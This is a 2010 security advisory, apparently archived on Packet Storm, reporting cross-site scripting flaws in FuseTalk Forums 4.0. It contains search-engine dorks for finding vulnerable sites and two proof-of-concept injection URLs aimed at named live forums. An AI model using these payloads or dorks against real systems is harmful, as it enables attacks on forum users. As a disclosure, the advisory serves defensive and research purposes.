FuseTalk Forums version 4.0 suffers from cross site scripting vulnerabilities.
5ee584db26751a109875b62fc70560e5650c91e0f64ad17531e082f02cd68801XSS vulnerability in FuseTalk Forums
-------------------------------------
Vulnerability ID: Month Of Full Disclosure 1 = MOFD1
------------------------------------
Product: FuseTalk
-------------------------------------
Vendor: FuseTalk Inc (
http://www.fusetalk.com/Company/AboutFuseTalk/tabid/111/Default.aspx )
-------------------------------------
Vulnerable Version: 4.0 Which is current version and Probably Prior Versions
-------------------------------------
Vendor Notification: 02 August 2010
Public Disclosure: 02 August 2010
-------------------------------------
Vulnerability Type: XSS (Cross Site Scripting)
-------------------------------------
Status: Public Disclosure - Not Fixed, Vendor Alerted,
Awaiting Vendor Response
-------------------------------------
Risk level: Medium
-------------------------------------
Credit: Martin Hall - TheTestManager
Site = http://www.thetestmanager.com
twitter = @thetestmanager
Vulnerability Details:
There exists multiple XSS errors in FuseTalk Forums.
These errors exist even months/years after previous HTML /SQL injection
errors were reported to FuseTalk.
It is time for a full and through source code review guys.
-------------------------------------
Potential Users Affected = minimum = 250,000 users
SunBelt = 5664 Users
FuseTalk = 11357
AMD = 103488 users
AMD Game = 43767
wilmott.com = 79718 users
collectors.com = 31396 users
2ndlight.com = 23033 users
-------------------------------------
Dork to find Vulnerable Sites (1)
fusetalk "users are registered"
Dork to find Vulnerable Sites (2)
© 1999-2010 FuseTalk Inc. All rights reserved.
-------------------------------------
Sample URL's
http://forums.fusetalk.com/usersearchresults.cfm?keyword=ttm--"%20><script>alert("TheTestManager.com-
Month of Full disclosure")</script>&FT_ACTION=SearchUsers - (IE8
tested)
or
http://supportforums.sunbeltsoftware.com/categories.aspx?catid=76&FTVAR_SORT=date&FTVAR_SORTORDER=0017ttm-"
style=x:expression(alert("TheTestManager")) ttm=" (IE7 test)
-------------------------------------
Solution:
Currently I'm not aware of any vendor-supplied patches or other solutions.
If you are aware of more recent information related to this issue
please notify me at: martin@hb-help.com
Users are recommended to use NoScript or other XSS mitigating software
Admins are advised to change forum software, or put pressure on
FuseTalk to carry out a full source code review.
-------------------------------------
Other Miscellany Information
http://www.fusetalk.com/ProductsServices/FuseTalk/WhosUsingFuseTalk/tabid/72/Default.aspx
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed